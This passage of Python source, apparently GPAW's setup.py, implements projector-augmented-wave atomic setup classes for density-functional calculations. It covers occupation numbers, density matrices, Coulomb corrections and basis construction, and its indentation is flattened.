elif type == 'ghost':
from gpaw.lcao.bsse import GhostSetupData
setupdata = GhostSetupData(symbol)
else:
setupdata = SetupData(symbol, xc.get_setup_name(),
type, True,
world=world)
if hasattr(setupdata, 'build'):
return LeanSetup(setupdata.build(xc, lmax, basis))
else:
return setupdata
class BaseSetup:
"""Mixin-class for setups.
This makes it possible to inherit the most important methods without
the cumbersome constructor of the ordinary Setup class.
Maybe this class will be removed in the future, or it could be
made a proper base class with attributes and so on."""
def print_info(self, text):
self.data.print_info(text, self)
def get_basis_description(self):
return self.basis.get_description()
def calculate_initial_occupation_numbers(self, magmom, hund, charge,
nspins, f_j=None):
"""If f_j is specified, custom occupation numbers will be used.
Hund rules disabled if so."""
niao = self.niAO
f_si = np.zeros((nspins, niao))
assert (not hund) or f_j is None
if f_j is None:
f_j = self.f_j
f_j = np.array(f_j, float)
l_j = np.array(self.l_j)
def correct_for_charge(f_j, charge, degeneracy_j, use_complete=True):
nj = len(f_j)
# correct for the charge
if charge >= 0:
# reduce the higher levels first
for j in range(nj - 1, -1, -1):
f = f_j[j]
if use_complete or f < degeneracy_j[j]:
c = min(f, charge)
f_j[j] -= c
charge -= c
else:
# add to the lower levels first
for j in range(nj):
f = f_j[j]
l = self.l_j[j]
if use_complete or f > 0:
c = min(degeneracy_j[j] - f, -charge)
f_j[j] += c
charge += c
if charge != 0:
correct_for_charge(f_j, charge, degeneracy_j, True)
# distribute the charge to the radial orbitals
if nspins == 1:
assert magmom == 0.0
f_sj = np.array([f_j])
correct_for_charge(f_sj[0], charge,
2 * (2 * l_j + 1))
else:
nval = f_j.sum() - charge
f_sj = 0.5 * np.array([f_j, f_j])
nup = 0.5 * (nval + magmom)
ndown = 0.5 * (nval - magmom)
correct_for_charge(f_sj[0], f_sj[0].sum() - nup,
2 * l_j + 1, False)
correct_for_charge(f_sj[1], f_sj[1].sum() - ndown,
2 * l_j + 1, False)
# Projector function indices:
nj = len(self.n_j)
# distribute to the atomic wave functions
i = 0
j = 0
for phit in self.phit_j:
l = phit.get_angular_momentum_number()
# Skip projector functions not in basis set:
while j < nj and self.l_j[j] != l:
j += 1
if j < nj:
f = f_j[j]
f_s = f_sj[:, j]
else:
f = 0
f_s = np.array([0, 0])
degeneracy = 2 * l + 1
if hund:
# Use Hunds rules:
#assert f == int(f)
f = int(f)
f_si[0, i:i + min(f, degeneracy)] = 1.0 # spin up
f_si[1, i:i + max(f - degeneracy, 0)] = 1.0 # spin down
if f < degeneracy:
magmom -= f
else:
magmom -= 2 * degeneracy - f
else:
for s in range(nspins):
f_si[s, i:i + degeneracy] = f_s[s] / degeneracy
i += degeneracy
j += 1
if hund and magmom != 0:
raise ValueError('Bad magnetic moment %g for %s atom!'
% (magmom, self.symbol))
assert i == niao
# print "fsi=", f_si
return f_si
def get_hunds_rule_moment(self, charge=0):
for M in range(10):
try:
self.calculate_initial_occupation_numbers(M, True, charge, 2)
except ValueError:
pass
else:
return M
raise RuntimeError
def initialize_density_matrix(self, f_si):
nspins, niao = f_si.shape
ni = self.ni
D_sii = np.zeros((nspins, ni, ni))
D_sp = np.zeros((nspins, ni * (ni + 1) // 2))
nj = len(self.n_j)
j = 0
i = 0
ib = 0
for phit in self.phit_j:
l = phit.get_angular_momentum_number()
# Skip projector functions not in basis set:
while j < nj and self.l_j[j] != l:
i += 2 * self.l_j[j] + 1
j += 1
if j == nj:
break
for m in range(2 * l + 1):
D_sii[:, i + m, i + m] = f_si[:, ib + m]
j += 1
i += 2 * l + 1
ib += 2 * l + 1
for s in range(nspins):
D_sp[s] = pack(D_sii[s])
return D_sp
def symmetrize(self, a, D_aii, map_sa):
D_ii = np.zeros((self.ni, self.ni))
for s, R_ii in enumerate(self.R_sii):
D_ii += np.dot(R_ii, np.dot(D_aii[map_sa[s][a]],
np.transpose(R_ii)))
return D_ii / len(map_sa)
def calculate_rotations(self, R_slmm):
nsym = len(R_slmm)
self.R_sii = np.zeros((nsym, self.ni, self.ni))
i1 = 0
for l in self.l_j:
i2 = i1 + 2 * l + 1
for s, R_lmm in enumerate(R_slmm):
self.R_sii[s, i1:i2, i1:i2] = R_lmm[l]
i1 = i2
def get_partial_waves(self):
"""Return spline representation of partial waves and densities."""
l_j = self.l_j
nj = len(l_j)
# cutoffs
rcut2 = 2 * max(self.rcut_j)
gcut2 = self.rgd.ceil(rcut2)
data = self.data
# Construct splines:
nc_g = data.nc_g.copy()
nct_g = data.nct_g.copy()
tauc_g = data.tauc_g
tauct_g = data.tauct_g
#nc_g[gcut2:] = nct_g[gcut2:] = 0.0
nc = self.rgd.spline(nc_g, rcut2, points=1000)
nct = self.rgd.spline(nct_g, rcut2, points=1000)
if tauc_g is None:
tauc_g = np.zeros(nct_g.shape)
tauct_g = tauc_g
tauc = self.rgd.spline(tauc_g, rcut2, points=1000)
tauct = self.rgd.spline(tauct_g, rcut2, points=1000)
phi_j = []
phit_j = []
for j, (phi_g, phit_g) in enumerate(zip(data.phi_jg, data.phit_jg)):
l = l_j[j]
phi_g = phi_g.copy()
phit_g = phit_g.copy()
phi_g[gcut2:] = phit_g[gcut2:] = 0.0
phi_j.append(self.rgd.spline(phi_g, rcut2, l, points=100))
phit_j.append(self.rgd.spline(phit_g, rcut2, l, points=100))
return phi_j, phit_j, nc, nct, tauc, tauct
def set_hubbard_u(self, U, l,scale=1,store=0,LinRes=0):
"""Set Hubbard parameter.
U in atomic units, l is the orbital to which we whish to
add a hubbard potential and scale enables or desables the
scaling of the overlap between the l orbitals, if true we enforce
<p|p>=1
Note U is in atomic units
"""
self.HubLinRes=LinRes;
self.Hubs = scale;
self.HubStore=store;
self.HubOcc=[];
self.HubU = U;
self.Hubl = l;
self.Hubi = 0;
for ll in self.l_j:
if ll == self.Hubl:
break
self.Hubi = self.Hubi + 2 * ll + 1
def four_phi_integrals(self):
"""Calculate four-phi integral.
Calculate the integral over the product of four all electron
functions in the augmentation sphere, i.e.::
/
| d vr ( phi_i1 phi_i2 phi_i3 phi_i4
/ - phit_i1 phit_i2 phit_i3 phit_i4 ),
where phi_i1 is an all electron function and phit_i1 is its
smooth partner.
"""
if hasattr(self, 'I4_pp'):
return self.I4_pp
# radial grid
ng = self.ng
g = np.arange(ng, dtype=float)
r2dr_g = self.rgd.r_g**2 * self.rgd.dr_g
phi_jg = self.data.phi_jg
phit_jg = self.data.phit_jg
# compute radial parts
nj = len(self.l_j)
R_jjjj = np.empty((nj, nj, nj, nj))
for j1 in range(nj):
for j2 in range(nj):
for j3 in range(nj):
for j4 in range(nj):
R_jjjj[j1, j2, j3, j4] = np.dot(r2dr_g,
phi_jg[j1] * phi_jg[j2] * phi_jg[j3] * phi_jg[j4] -
phit_jg[j1] * phit_jg[j2] * phit_jg[j3] * phit_jg[j4])
# prepare for angular parts
L_i = []
j_i = []
for j, l in enumerate(self.l_j):
for m in range(2 * l + 1):
L_i.append(l**2 + m)
j_i.append(j)
ni = len(L_i)
# j_i is the list of j values
# L_i is the list of L (=l**2+m for 0<=m<2*l+1) values
# https://wiki.fysik.dtu.dk/gpaw/devel/overview.html
# calculate the integrals
_np = ni * (ni + 1) // 2 # length for packing
self.I4_pp = np.empty((_np, _np))
p1 = 0
for i1 in range(ni):
L1 = L_i[i1]
j1 = j_i[i1]
for i2 in range(i1, ni):
L2 = L_i[i2]
j2 = j_i[i2]
p2 = 0
for i3 in range(ni):
L3 = L_i[i3]
j3 = j_i[i3]
for i4 in range(i3, ni):
L4 = L_i[i4]
j4 = j_i[i4]
self.I4_pp[p1, p2] = (np.dot(G_LLL[L1, L2],
G_LLL[L3, L4]) *
R_jjjj[j1, j2, j3, j4])
p2 += 1
p1 += 1
# To unpack into I4_iip do:
# from gpaw.utilities import unpack
# I4_iip = np.empty((ni, ni, _np)):
# for p in range(_np):
# I4_iip[..., p] = unpack(I4_pp[:, p])
return self.I4_pp
class LeanSetup(BaseSetup):
"""Setup class with minimal attribute set.
A setup-like class must define at least the attributes of this
class in order to function in a calculation."""
def __init__(self, s):
"""Copies precisely the necessary attributes of the Setup s."""
# R_sii and HubU can be changed dynamically (which is ugly)
self.R_sii = None # rotations, initialized when doing sym. reductions
self.HubU = s.HubU # XXX probably None
self.lq = s.lq # Required for LDA+U I think.
self.type = s.type # required for writing to file
self.fingerprint = s.fingerprint # also req. for writing
self.filename = s.filename
self.symbol = s.symbol
self.Z = s.Z
self.Nv = s.Nv
self.Nc = s.Nc
self.ni = s.ni
self.niAO = s.niAO # XXX rename to nao
self.pt_j = s.pt_j
self.phit_j = s.phit_j # basis functions
self.Nct = s.Nct
self.nct = s.nct
self.lmax = s.lmax
self.ghat_l = s.ghat_l
self.rcgauss = s.rcgauss
self.vbar = s.vbar
self.Delta_pL = s.Delta_pL
self.Delta0 = s.Delta0
self.E = s.E
self.Kc = s.Kc
self.M = s.M
self.M_p = s.M_p
self.M_pp = s.M_pp
self.K_p = s.K_p
self.MB = s.MB
self.MB_p = s.MB_p
self.dO_ii = s.dO_ii
self.xc_correction = s.xc_correction
# Required to calculate initial occupations
self.f_j = s.f_j
self.n_j = s.n_j
self.l_j = s.l_j
self.nj = len(s.l_j)
self.data = s.data
# Below are things which are not really used all that much,
# i.e. shouldn't generally be necessary. Maybe we can make a system
# involving dictionaries for these "optional" parameters
# Required by print_info
self.rcutfilter = s.rcutfilter
self.rcore = s.rcore
self.basis = s.basis # we don't need niAO if we use this instead
# Can also get rid of the phit_j splines if need be
self.N0_p = s.N0_p # req. by estimate_magnetic_moments
self.nabla_iiv = s.nabla_iiv # req. by lrtddft
# XAS stuff
self.phicorehole_g = s.phicorehole_g # should be optional
if s.phicorehole_g is not None:
self.A_ci = s.A_ci # oscillator strengths
# Required to get all electron density
self.rgd = s.rgd
self.rcut_j = s.rcut_j
self.tauct = s.tauct # required by TPSS, MGGA
self.Delta_Lii = s.Delta_Lii # required with external potential
self.B_ii = s.B_ii # required for exact inverse overlap operator
self.dC_ii = s.dC_ii # required by time-prop tddft with apply_inverse
# Required by exx
self.X_p = s.X_p
self.ExxC = s.ExxC
# Required by electrostatic correction
self.dEH0 = s.dEH0
self.dEH_p = s.dEH_p
# Required by utilities/kspot.py (AllElectronPotential)
self.g_lg = s.g_lg
# Probably empty dictionary, required by GLLB
self.extra_xc_data = s.extra_xc_data
# Required for rtxs
self.T_Lqp = s.T_Lqp
class Setup(BaseSetup):
"""Attributes:
========== =====================================================
Name Description
========== =====================================================
``Z`` Charge
``type`` Type-name of setup (eg. 'paw')
``symbol`` Chemical element label (eg. 'Mg')
``xcname`` Name of xc
``data`` Container class for information on the the atom, eg.
Nc, Nv, n_j, l_j, f_j, eps_j, rcut_j.
It defines the radial grid by ng and beta, from which
r_g = beta * arange(ng) / (ng - arange(ng)).
It stores pt_jg, phit_jg, phi_jg, vbar_g
========== =====================================================
Attributes for making PAW corrections
============= ==========================================================
Name Description
============= ==========================================================
``Delta0`` Constant in compensation charge expansion coeff.
``Delta_Lii`` Linear term in compensation charge expansion coeff.
``Delta_pL`` Packed version of ``Delta_Lii``.
``dO_ii`` Overlap coefficients
``B_ii`` Projector function overlaps B_ii = <pt_i | pt_i>
``dC_ii`` Inverse overlap coefficients
``E`` Reference total energy of atom
``M`` Constant correction to Coulomb energy
``M_p`` Linear correction to Coulomb energy
``M_pp`` 2nd order correction to Coulomb energy and Exx energy
``Kc`` Core kinetic energy
``K_p`` Linear correction to kinetic energy
``ExxC`` Core Exx energy
``X_p`` Linear correction to Exx energy
``MB`` Constant correction due to vbar potential
``MB_p`` Linear correction due to vbar potential
``dEH0`` Constant correction due to average electrostatic potential
``dEH_p`` Linear correction due to average electrostatic potential
``I4_iip`` Correction to integrals over 4 all electron wave functions
``Nct`` Analytical integral of the pseudo core density ``nct``
============= ==========================================================
It also has the attribute ``xc_correction`` which is an XCCorrection class
instance capable of calculating the corrections due to the xc functional.
Splines:
========== ============================================
Name Description
========== ============================================
``pt_j`` Projector functions
``phit_j`` Pseudo partial waves
``vbar`` vbar potential
``nct`` Pseudo core density
``ghat_l`` Compensation charge expansion functions
``tauct`` Pseudo core kinetic energy density
========== ============================================
"""
def __init__(self, data, xc, lmax=0, basis=None):
self.type = data.name
self.HubU = None
if not data.is_compatible(xc):
raise ValueError('Cannot use %s setup with %s functional' %
(data.setupname, xc.get_setup_name()))
self.symbol = symbol = data.symbol
self.data = data
self.Nc = data.Nc
self.Nv = data.Nv
self.Z = data.Z
l_j = self.l_j = data.l_j
n_j = self.n_j = data.n_j
self.f_j = data.f_j
self.eps_j = data.eps_j
nj = self.nj = len(l_j)
rcut_j = self.rcut_j = data.rcut_j
self.ExxC = data.ExxC
self.X_p = data.X_p
pt_jg = data.pt_jg
phit_jg = data.phit_jg
phi_jg = data.phi_jg
self.fingerprint = data.fingerprint
self.filename = data.filename
rgd = self.rgd = data.rgd
r_g = rgd.r_g
dr_g = rgd.dr_g
self.lmax = lmax
# Find Fourier-filter cutoff radius:
gcutfilter = data.get_max_projector_cutoff()
self.rcutfilter = rcutfilter = r_g[gcutfilter]
rcutmax = max(rcut_j)
rcut2 = 2 * rcutmax
gcut2 = rgd.ceil(rcut2)
self.gcut2 = gcut2
self.gcutmin = rgd.ceil(min(rcut_j))
ni = 0
i = 0
j = 0
jlL_i = []
for l, n in zip(l_j, n_j):
for m in range(2 * l + 1):
jlL_i.append((j, l, l**2 + m))
i += 1
j += 1
ni = i
self.ni = ni
_np = ni * (ni + 1) // 2
self.nq = nq = nj * (nj + 1) // 2
lcut = max(l_j)
if 2 * lcut < lmax:
lcut = (lmax + 1) // 2
self.lcut = lcut
self.B_ii = self.calculate_projector_overlaps(pt_jg)
self.fcorehole = data.fcorehole
self.lcorehole = data.lcorehole
if data.phicorehole_g is not None:
if self.lcorehole == 0:
self.calculate_oscillator_strengths(phi_jg)
else:
self.A_ci = None
# Construct splines:
self.vbar = rgd.spline(data.vbar_g, rcutfilter)
rcore, nc_g, nct_g, nct = self.construct_core_densities(data)
self.rcore = rcore
self.nct = nct
# Construct splines for core kinetic energy density:
tauct_g = data.tauct_g
if tauct_g is None:
tauct_g = np.zeros(ng)
self.tauct = rgd.spline(tauct_g, self.rcore)
self.pt_j = self.create_projectors(rcutfilter)
if basis is None:
basis = self.create_basis_functions(phit_jg, rcut2, gcut2)
phit_j = basis.tosplines()
self.phit_j = phit_j
self.basis = basis #?
self.niAO = 0
for phit in self.phit_j:
l = phit.get_angular_momentum_number()
self.niAO += 2 * l + 1
rgd2 = self.rgd2 = AERadialGridDescriptor(rgd.a, rgd.b, gcut2)
r_g = rgd2.r_g
dr_g = rgd2.dr_g
phi_jg = np.array([phi_g[:gcut2].copy() for phi_g in phi_jg])
phit_jg = np.array([phit_g[:gcut2].copy() for phit_g in phit_jg])
self.nc_g = nc_g = nc_g[:gcut2].copy()
self.nct_g = nct_g = nct_g[:gcut2].copy()
vbar_g = data.vbar_g[:gcut2].copy()
tauc_g = data.tauc_g[:gcut2].copy()
extra_xc_data = dict(data.extra_xc_data)
# Cut down the GLLB related extra data
for key, item in extra_xc_data.iteritems():
if len(item) == rgd.N:
extra_xc_data[key] = item[:gcut2].copy()
self.extra_xc_data = extra_xc_data
self.phicorehole_g = data.phicorehole_g
if self.phicorehole_g is not None:
self.phicorehole_g = self.phicorehole_g[:gcut2].copy()
T_Lqp = self.calculate_T_Lqp(lcut, nq, _np, nj, jlL_i)
self.T_Lqp = T_Lqp
(g_lg, n_qg, nt_qg, Delta_lq, self.Lmax, self.Delta_pL, Delta0,
self.N0_p) = self.get_compensation_charges(phi_jg, phit_jg, _np,
T_Lqp)
self.Delta0 = Delta0
self.g_lg = g_lg
# Solves the radial poisson equation for density n_g
def H(n_g, l):
return rgd2.poisson(n_g, l) * r_g * dr_g
wnc_g = H(nc_g, l=0)
wnct_g = H(nct_g, l=0)
self.wg_lg = wg_lg = [H(g_lg[l], l) for l in range(lmax + 1)]
wn_lqg = [np.array([H(n_qg[q], l) for q in range(nq)])
for l in range(2 * lcut + 1)]
wnt_lqg = [np.array([H(nt_qg[q], l) for q in range(nq)])
for l in range(2 * lcut + 1)]
rdr_g = r_g * dr_g
dv_g = r_g * rdr_g
A = 0.5 * np.dot(nc_g, wnc_g)
A -= sqrt(4 * pi) * self.Z * np.dot(rdr_g, nc_g)
mct_g = nct_g + Delta0 * g_lg[0]
wmct_g = wnct_g + Delta0 * wg_lg[0]
A -= 0.5 * np.dot(mct_g, wmct_g)
self.M = A
self.MB = -np.dot(dv_g * nct_g, vbar_g)
AB_q = -np.dot(nt_qg, dv_g * vbar_g)
self.MB_p = np.dot(AB_q, T_Lqp[0])
# Correction for average electrostatic potential:
#
# dEH = dEH0 + dot(D_p, dEH_p)
#
self.dEH0 = sqrt(4 * pi) * (wnc_g - wmct_g -
sqrt(4 * pi) * self.Z * r_g * dr_g).sum()
dEh_q = (wn_lqg[0].sum(1) - wnt_lqg[0].sum(1) -
Delta_lq[0] * wg_lg[0].sum())
self.dEH_p = np.dot(dEh_q, T_Lqp[0]) * sqrt(4 * pi)
M_p, M_pp = self.calculate_coulomb_corrections(lcut, n_qg, wn_lqg,
lmax, Delta_lq,
wnt_lqg, g_lg,
wg_lg, nt_qg,
_np, T_Lqp, nc_g,
wnc_g, rdr_g, mct_g,
wmct_g)
self.M_p = M_p
self.M_pp = M_pp
if xc.type == 'GLLB':
if 'core_f' in self.extra_xc_data:
self.wnt_lqg = wnt_lqg
self.wn_lqg = wn_lqg
self.fc_j = self.extra_xc_data['core_f']
self.lc_j = self.extra_xc_data['core_l']
self.njcore = len(self.lc_j)
if self.njcore > 0:
self.uc_jg = self.extra_xc_data['core_states'].reshape(
(self.njcore, -1))
self.uc_jg = self.uc_jg[:, :gcut2]
self.phi_jg = phi_jg
self.Kc = data.e_kinetic_core - data.e_kinetic
self.M -= data.e_electrostatic
self.E = data.e_total
Delta0_ii = unpack(self.Delta_pL[:, 0].copy())
self.dO_ii = data.get_overlap_correction(Delta0_ii)
self.dC_ii = self.get_inverse_overlap_coefficients(self.B_ii,
self.dO_ii)
self.Delta_Lii = np.zeros((ni, ni, self.Lmax)) # XXX index order
for L in range(self.Lmax):
self.Delta_Lii[:, :, L] = unpack(self.Delta_pL[:, L].copy())
self.Nct = data.get_smooth_core_density_integral(Delta0)
self.K_p = data.get_linear_kinetic_correction(T_Lqp[0])
r = 0.02 * rcut2 * np.arange(51, dtype=float)
alpha = data.rcgauss**-2
self.ghat_l = data.get_ghat(lmax, alpha, r, rcut2)#;print 'use g_lg!'
self.rcgauss = data.rcgauss
self.xc_correction = data.get_xc_correction(rgd2, xc, gcut2, lcut)
self.nabla_iiv = self.get_derivative_integrals(rgd2, phi_jg, phit_jg)
def calculate_coulomb_corrections(self, lcut, n_qg, wn_lqg,
lmax, Delta_lq, wnt_lqg,
g_lg, wg_lg, nt_qg, _np, T_Lqp,
nc_g, wnc_g, rdr_g, mct_g, wmct_g):
# Can we reduce the excessive parameter passing?
A_q = 0.5 * (np.dot(wn_lqg[0], nc_g) + np.dot(n_qg, wnc_g))
A_q -= sqrt(4 * pi) * self.Z * np.dot(n_qg, rdr_g)
A_q -= 0.5 * (np.dot(wnt_lqg[0], mct_g) + np.dot(nt_qg, wmct_g))
A_q -= 0.5 * (np.dot(mct_g, wg_lg[0])
+ np.dot(g_lg[0], wmct_g)) * Delta_lq[0]
M_p = np.dot(A_q, T_Lqp[0])
A_lqq = []
for l in range(2 * lcut + 1):
A_qq = 0.5 * np.dot(n_qg, np.transpose(wn_lqg[l]))
A_qq -= 0.5 * np.dot(nt_qg, np.transpose(wnt_lqg[l]))
if l <= lmax:
A_qq -= 0.5 * np.outer(Delta_lq[l],
np.dot(wnt_lqg[l], g_lg[l]))
A_qq -= 0.5 * np.outer(np.dot(nt_qg, wg_lg[l]), Delta_lq[l])
A_qq -= 0.5 * np.dot(g_lg[l], wg_lg[l]) * \
np.outer(Delta_lq[l], Delta_lq[l])
A_lqq.append(A_qq)
M_pp = np.zeros((_np, _np))
L = 0
for l in range(2 * lcut + 1):
for m in range(2 * l + 1):
M_pp += np.dot(np.transpose(T_Lqp[L]),
np.dot(A_lqq[l], T_Lqp[L]))
L += 1
return M_p, M_pp
def create_projectors(self, rcut):
pt_j = []
for j, pt_g in enumerate(self.data.pt_jg):
l = self.l_j[j]
pt_j.append(self.rgd.spline(pt_g, rcut, l))
return pt_j
def get_inverse_overlap_coefficients(self, B_ii, dO_ii):
ni = len(B_ii)
xO_ii = np.dot(B_ii, dO_ii)
return -np.dot(dO_ii, np.linalg.inv(np.identity(ni) + xO_ii))
def calculate_T_Lqp(self, lcut, nq, _np, nj, jlL_i):
Lcut = (2 * lcut + 1)**2
T_Lqp = np.zeros((Lcut, nq, _np))
p = 0
i1 = 0
for j1, l1, L1 in jlL_i:
for j2, l2, L2 in jlL_i[i1:]:
if j1 < j2:
q = j2 + j1 * nj - j1 * (j1 + 1) // 2
else:
q = j1 + j2 * nj - j2 * (j2 + 1) // 2
T_Lqp[:, q, p] = G_LLL[L1, L2, :Lcut]
p += 1
i1 += 1
return T_Lqp
def calculate_projector_overlaps(self, pt_jg):
"""Compute projector function overlaps B_ii = <pt_i | pt_i>."""
nj = len(pt_jg)
B_jj = np.zeros((nj, nj))
for j1, pt1_g in enumerate(pt_jg):
for j2, pt2_g in enumerate(pt_jg):
B_jj[j1, j2] = self.rgd.integrate(pt1_g * pt2_g) / (4 * pi)
B_ii = np.zeros((self.ni, self.ni))
i1 = 0
for j1, l1 in enumerate(self.l_j):
for m1 in range(2 * l1 + 1):
i2 = 0
for j2, l2 in enumerate(self.l_j):
for m2 in range(2 * l2 + 1):
if l1 == l2 and m1 == m2:
B_ii[i1, i2] = B_jj[j1, j2]
i2 += 1
i1 += 1
return B_ii
def get_compensation_charges(self, phi_jg, phit_jg, _np, T_Lqp):
lmax = self.lmax
gcut2 = self.gcut2
nq = self.nq
g_lg = self.data.create_compensation_charge_functions(lmax)
n_qg = np.zeros((nq, gcut2))
nt_qg = np.zeros((nq, gcut2))
q = 0 # q: common index for j1, j2
for j1 in range(self.nj):
for j2 in range(j1, self.nj):
n_qg[q] = phi_jg[j1] * phi_jg[j2]
nt_qg[q] = phit_jg[j1] * phit_jg[j2]
q += 1
gcutmin = self.gcutmin
r_g = self.rgd2.r_g
dr_g = self.rgd2.dr_g
self.lq = np.dot(n_qg[:, :gcutmin], r_g[:gcutmin]**2 * dr_g[:gcutmin])
Delta_lq = np.zeros((lmax + 1, nq))
for l in range(lmax + 1):
Delta_lq[l] = np.dot(n_qg - nt_qg, r_g**(2 + l) * dr_g)
Lmax = (lmax + 1)**2
Delta_pL = np.zeros((_np, Lmax))
for l in range(lmax + 1):
L = l**2
for m in range(2 * l + 1):
delta_p = np.dot(Delta_lq[l], T_Lqp[L + m])
Delta_pL[:, L + m] = delta_p
Delta0 = np.dot(self.nc_g - self.nct_g,
r_g**2 * dr_g) - self.Z / sqrt(4 * pi)
# Electron density inside augmentation sphere. Used for estimating
# atomic magnetic moment:
rcutmax = max(self.rcut_j)
gcutmax = self.rgd.round(rcutmax)
N0_q = np.dot(n_qg[:, :gcutmax], (r_g**2 * dr_g)[:gcutmax])
N0_p = np.dot(N0_q, T_Lqp[0]) * sqrt(4 * pi)
return (g_lg[:, :gcut2].copy(), n_qg, nt_qg,
Delta_lq, Lmax, Delta_pL, Delta0, N0_p)
def get_derivative_integrals(self, rgd, phi_jg, phit_jg):
"""Calculate PAW-correction matrix elements of nabla.
::
/ _ _ d _ ~ _ d ~ _
| dr [phi (r) -- phi (r) - phi (r) -- phi (r)]
/ 1 dx 2 1 dx 2
and similar for y and z."""
if extra_parameters.get('fprojectors'):
return None
r_g = rgd.r_g
dr_g = rgd.dr_g
nabla_iiv = np.empty((self.ni, self.ni, 3))
i1 = 0
for j1 in range(self.nj):
l1 = self.l_j[j1]
nm1 = 2 * l1 + 1
i2 = 0
for j2 in range(self.nj):
l2 = self.l_j[j2]
nm2 = 2 * l2 + 1
f1f2or = np.dot(phi_jg[j1] * phi_jg[j2] -
phit_jg[j1] * phit_jg[j2], r_g * dr_g)
dphidr_g = np.empty_like(phi_jg[j2])
rgd.derivative(phi_jg[j2], dphidr_g)
dphitdr_g = np.empty_like(phit_jg[j2])
rgd.derivative(phit_jg[j2], dphitdr_g)
f1df2dr = np.dot(phi_jg[j1] * dphidr_g -
phit_jg[j1] * dphitdr_g, r_g**2 * dr_g)
for v in range(3):
Lv = 1 + (v + 2) % 3
nabla_iiv[i1:i1 + nm1, i2:i2 + nm2, v] = (
(4 * pi / 3)**0.5 * (f1df2dr - l2 * f1f2or) *
G_LLL[Lv, l2**2:l2**2 + nm2, l1**2:l1**2 + nm1].T +
f1f2or *
Y_LLv[l1**2:l1**2 + nm1, l2**2:l2**2 + nm2, v])
i2 += nm2
i1 += nm1
return nabla_iiv
def construct_core_densities(self, setupdata):
rcore = self.data.find_core_density_cutoff(setupdata.nc_g)
nct = self.rgd.spline(setupdata.nct_g, rcore)
return rcore, setupdata.nc_g, setupdata.nct_g, nct
def create_basis_functions(self, phit_jg, rcut2, gcut2):
# Cutoff for atomic orbitals used for initial guess:
rcut3 = 8.0 # XXXXX Should depend on the size of the atom!
gcut3 = self.rgd.ceil(rcut3)
# We cut off the wave functions smoothly at rcut3 by the
# following replacement:
#
# /
# | f(r), r < rcut2
# f(r) <- < f(r) - a(r) f(rcut3) - b(r) f'(rcut3), rcut2 < r < rcut3
# | 0, r > rcut3
# \
#
# where a(r) and b(r) are 4. order polynomials:
#
# a(rcut2) = 0, a'(rcut2) = 0, a''(rcut2) = 0,
# a(rcut3) = 1, a'(rcut3) = 0
# b(rcut2) = 0, b'(rcut2) = 0, b''(rcut2) = 0,
# b(rcut3) = 0, b'(rcut3) = 1
#
r_g = self.rgd.r_g
x = (r_g[gcut2:gcut3] - rcut2) / (rcut3 - rcut2)
a_g = 4 * x**3 * (1 - 0.75 * x)
b_g = x**3 * (x - 1) * (rcut3 - rcut2)
class PartialWaveBasis(Basis): # yuckkk
def __init__(self, symbol, phit_j):
Basis.__init__(self, symbol, 'partial-waves', readxml=False)
self.phit_j = phit_j
def tosplines(self):
return self.phit_j
def get_description(self):
template = 'Using partial waves for %s as LCAO basis'
string = template % self.symbol
return string
phit_j = []
for j, phit_g in enumerate(phit_jg):
if self.n_j[j] > 0:
l = self.l_j[j]
phit = phit_g[gcut3]
dphitdr = ((phit - phit_g[gcut3 - 1]) /
(r_g[gcut3] - r_g[gcut3 - 1]))
phit_g[gcut2:gcut3] -= phit * a_g + dphitdr * b_g
phit_g[gcut3:] = 0.0
phit_j.append(self.rgd.spline(phit_g, rcut3, l, points=100))
basis = PartialWaveBasis(self.symbol, phit_j)
return basis
def calculate_oscillator_strengths(self, phi_jg):
# XXX implement oscillator strengths for lcorehole != 0
assert(self.lcorehole == 0)
self.A_ci = np.zeros((3, self.ni))
nj = len(phi_jg)
i = 0
for j in range(nj):
l = self.l_j[j]
if l == 1:
a = self.rgd.integrate(phi_jg[j] * self.data.phicorehole_g,
n=1) / (4 * pi)
for m in range(3):
c = (m + 1) % 3
self.A_ci[c, i] = a
i += 1
else:
i += 2 * l + 1
assert i == self.ni
class Setups(list):
"""Collection of Setup objects. One for each distinct atom.
Non-distinct atoms are those with the same atomic number, setup, and basis.
Class attributes:
``nvalence`` Number of valence electrons.
``nao`` Number of atomic orbitals.
``Eref`` Reference energy.
``core_charge`` Core hole charge.
"""
def __init__(self, Z_a, setup_types, basis_sets, lmax, xc,
world=None):
list.__init__(self)
symbols = [chemical_symbols[Z] for Z in Z_a]
type_a = types2atomtypes(symbols, setup_types, default='paw')
basis_a = types2atomtypes(symbols, basis_sets, default=None)
# Construct necessary PAW-setup objects:
self.setups = {}
natoms = {}
self.id_a = zip(Z_a, type_a, basis_a)
for id in self.id_a:
setup = self.setups.get(id)
if setup is None:
Z, type, basis = id
symbol = chemical_symbols[Z]
setupdata = None
if not isinstance(type, str):
setupdata = type
# Basis may be None (meaning that the setup decides), a string
# (meaning we load the basis set now from a file) or an actual
# pre-created Basis object (meaning we just pass it along)
if isinstance(basis, str):
basis = Basis(symbol, basis, world=world)
setup = create_setup(symbol, xc, lmax, type,
basis, setupdata=setupdata, world=world)
self.setups[id] = setup
natoms[id] = 0
natoms[id] += 1
self.append(setup)
# Sum up ...
self.nvalence = 0 # number of valence electrons
self.nao = 0 # number of atomic orbitals
self.Eref = 0.0 # reference energy
self.core_charge = 0.0 # core hole charge
for id, setup in self.setups.items():
n = natoms[id]
self.Eref += n * setup.E
self.core_charge += n * (setup.Z - setup.Nv - setup.Nc)
self.nvalence += n * setup.Nv
self.nao += n * setup.niAO
def set_symmetry(self, symmetry):
"""Find rotation matrices for spherical harmonics."""
R_slmm = []
for op_cc in symmetry.op_scc:
op_vv = np.dot(np.linalg.inv(symmetry.cell_cv),
np.dot(op_cc, symmetry.cell_cv))
R_slmm.append([rotation(l, op_vv) for l in range(4)])
for setup in self.setups.values():
setup.calculate_rotations(R_slmm)
def types2atomtypes(symbols, types, default):
"""Map a types identifier to a list with a type id for each atom.
types can be a single str, or a dictionary mapping chemical
symbols and/or atom numbers to a type identifier.
If both a symbol key and atomnumber key relates to the same atom, then
the atomnumber key is dominant.
If types is a dictionary and contains None, this will be used as default
type, otherwize input arg ``default`` is used as default.
"""
natoms = len(symbols)
if isinstance(types, str):
return [types] * natoms
# If present, None will map to the default type, else use the input default
type_a = [types.get(None, default)] * natoms
# First symbols ...
for symbol, type in types.items():
if isinstance(symbol, str):
for a, symbol2 in enumerate(symbols):
if symbol == symbol2:
type_a[a] = type
# and then atom indices
for a, type in types.items():
if isinstance(a, int):
type_a[a] = type
return type_a
|
ajylee/gpaw-rtxs
|
gpaw/setup.py
|
Python
|
gpl-3.0
| 39,336
|
[
